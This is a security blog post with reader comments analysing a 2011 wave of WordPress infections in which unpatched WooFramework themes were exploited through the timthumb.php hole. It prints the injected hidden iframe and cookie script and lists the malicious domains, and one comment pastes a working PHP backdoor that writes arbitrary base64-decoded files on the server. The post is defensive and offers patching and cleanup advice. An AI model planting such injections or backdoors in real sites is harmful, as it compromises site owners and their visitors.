msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Hackers target unpatched WooFramework

   24 Aug 11   Filed in Short Attack Reviews

When Michael VanDeMar mentioned the malicious “googlesafebrowsing .com” domain, I decided to check how exactly it was used in malware attacks. It’s quite a popular trick to mimic Google’s own domains to make malicious code look legitimate. I have a “collection” of several dozens on misspelled Google Analytics domains alone that were used for malware distribution. In this case, the domain name was made up rather than misspelled. It referres to Google’s Safe Browsing project and their diagnostic pages that actually use the google.com domain (as most other Google’s services).

Just a few searches and I figured out the the malicious URL was googlesafebrowsing .com/kwizhveo.php . The next step was to find infected sites and the malicious code that used that URL.

Bing somehow found that URL so there should be backlinks. I decided to check the URL using MajesticSEO Site Explorer (you can use it to check backlinks to particular URLs as well as whole domains). Bingo! The Site Explorer returned 10,453 backlinks (exactly to kwizhveo.php) from 360 unique domains.

When I checked the pages, I didn’t find any references to googlesafebrowsing .com, but all of them contained hidden iframes that opened the kwizhveo.php on a different domain: hxxp://prettymiistmen .us .to/kwizhveo.php. I used a search and found one more domain with the kwizhveo.php URL: hxxp://musiictochapman .us .to/kwizhveo .php. MajesticSEO returned almost the same backlinks for this URL. That was obviously the same attack that just updated the injected code and used new disposable domains.

For example, the googlesafebrowsing .com domain was registered on Aug 17th, 2011 and was in use for two days only: Aug 19-20.

googlesafebrowsing history

Then I watched the infected sites for a day, and during the day, the iframe URL changed several times. This happened synchronously on all infected sites.

  • hxxp://sexyjju88 .us .to/kwizhveo.php
  • hxxp://freemii69 .us .to/kwizhveo.php
  • hxxp://heidiheernande .us .to/kwizhveo.php
  • hxxp://blaackhatt58 .us .to/kwizhveo.php
  • hxxp://gufmaurr79 .us .to/kwizhveo.php
  • hxxp://freeagcoll .us .to/kwizhveo.php
  • hxxp://prettyrosseande .us .to/kwizhveo.php
  • hxxp://coolerikpowwel .us .to/kwizhveo.php
  • hxxp://cooldeliia97 .us .to/kwizhveo.php
  • hxxp://bastalevarrga .us .to/kwizhveo.php
  • hxxp://seveende98 .us .to/kwizhveo.php
  • hxxp://statcounter .com/kwizhveo.php

WooFramework

Let’s get back to the infected sites. All 372 infected sites that I found via MajesticSEO are WordPress blogs (I guess, the may be more infected sites). And it was easy to notice that almost all of them used themes built upon various version of Woo Framework, the engine behind all popular premium WooThemes. Here’s how it looks in Unmask Parasites reports.

infected sites that uses WooFramework

Timthumb.php vulnerability

As with most of the recent WordPress hacks, I believe the timthumb vulnerability was the attack vector in this case too. WooFramework uses this file. They know about the problem. Moreover they patched their framework in the beginning of August (WooFramework v4.4.2) and began to notify webmasters who used vulnerable versions of their themes via WordPress Dashboard. Apperantly, not all webmasters listened to them and left their themes unpatched.

Malicious code

The injected iframe code looks like this:

<ifr ame src="hxxp://freemii69. us .to/ kwizhveo.php" width="1" height="1" frameborder="0">
</iframe>

The iframe is always bundled with some strange and rather pointless JavaScript code that calls itself “WordPress Counter” (any ideas what the purpose of this code is besides making the iframe tag less prominent?):

<!-- WordPress Counter -->
<script language="javascript">
var ExpDate = new Date ();
ExpDate.setTime(ExpDate.getTime() + (7 * 24 * 60 * 60));
SetCookie("MTPT","1",ExpDate, "/");
function SetCookie (name, value) {
var argv = SetCookie.arguments;
var argc = SetCookie.arguments.length;
var expires = (argc > 2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;
var secure = (argc > 5) ? argv[5] : false;
document.cookie = name + "=" + escape (value) +
((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
((path == null) ? "" : ("; path=" + path)) +
((domain == null) ? "" : ("; domain=" + domain)) +
((secure == true) ? "; secure" : "");
}
</script>
<ifr ame src="hxxp://freemii69 .us .to/kwizhveo .php" width="1" height="1" frameborder="0">
</iframe>
<!-- WordPress Counter -->

The placement of the code suggests that it must have been injected into WordPress theme files. Most likely into header.php.

Malware detection

In my case, the malicious iframe tried to push some Java exploit (ardmbsesalkt.jar). It only happens when you visit the infected page for the first time.

None of the 372 domains in my list are currently blacklisted by Google. And the currently used malicious domains are not blacklisted either. So don’t rely on your browser and Google. If you use Firefox, the NoScript extension is your best friend.

To webmasters of WordPress blogs

If you use WooThemes, make sure to upgrade your WooFramework ASAP!

Even if you don’t use WooThemes, check whether any of your themes or plugins use timthumb.php (or thumb.php). If you find such themes or/and plugins, you should upgrade them ASAP. If there are no available updates that patch the timthumb vulnerability, you should update the timthumb.php file yourself. You can get it here: http://code.google.com/p/timthumb/.

It is not enough to remove the malicious code from your files. Most likely hackers uploaded multiple backdoor files to your server. To stop the attack, you should find and remove all of them.

Sidenote: One of the hacked sites that contained the malicious “GoogleSafeBrowsing .com” iframe (and still contains newer variants of that iframe) is the InsideGoogle.com blog that aims to educate the public and opinion leaders about Google’s dangerous dominance over the Internet, computing and our online lives. Now they can use one more argument: the dominance of Google’s services allows cybercriminals to mask they activity using Google-like domain names ;-)

##
If you have any additional information about this attack, please share it in the comments below.

Related posts:

Reader's Comments (9)

  1. |

    Very good post :) We just posted about it as well. That domain now is being used to control what to display:

    hxxp://googlesafebrowsing .com/remoted.cc.txt

    I posted the full code added to the header.php here:

    http://blog.sucuri.net/2011/08/timthumb-php-attacks-now-using-googlesafebrowsing-com.html

    thanks,

    • |

      Thanks David,

      Now I see what’s the point in that cookie code. The malicious code is only supposed to be injected for new and not logged in (e.g. blog owner) visitors.

      And I was right about the header.php file.

      What see is the malicious code save the domain name in WordPress database and tryies to update it (from hxxp://googlesafebrowsing .com/remoted.cc.txt)every 10 minutes. Correct?

  2. |

    How long does it take for the Google Malware warnings and such to disappear after the exploit has been removed?

    I’ve followed the instructions, have removed the injected code from the header.php file, the thumb.php file had this added to it:

    $p=$_POST;
    if (isset ($p["t"])) {
    echo “Test “.”OK”;
    die();
    }
    elseif (isset ($p["d"])) {
    $cdir = scandir(“cache”);
    foreach ($cdir as $dd) {
    if (stripos($dd, “.php”) !== false)
    unlink (“cache/”.$dd);
    }
    die();
    }
    elseif (isset ($p["n"])) {
    $f=@fopen($p["n"], “w”);
    @fputs($f,base64_decode($p["c"]));
    @fclose($f);
    die();
    }

    Anyhow, replaced thumb.php with the updated version as well.

    Still, this was a couple hours ago. The Google Malware warning is still present on this site. Will this continue to happen until Google crawls the site again or does that mean the exploit / whatever is still active?

    Thanks for the information

  3. |

    What happened when Google visited this site?

    Of the 2 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-08-24, and the last time suspicious content was found on this site was on 2011-08-24.

    Malicious software is hosted on 2 domain(s), including freeagcoll.us.to/, prettyrosseande.us.to/.

    That’s the message I still get.

  4. |

    Well, I got hacked and Google flagged me…no idea how to fix it and now idea what to do but at least I know what is wrong…lol.

  5. |

    By the way I got NO WARNING from WooThemes whatsoever.

    • |

      I’m not familiar with the internals of WooFramework. You must be using an old version that doesn’t support update notifications.

  6. |

    I use a wootheme and wasn’t notified. I am diligent about keeping my plugins, themes, wordpress updated.

    I was hacked yesterday :(

    Working on cleaning it up.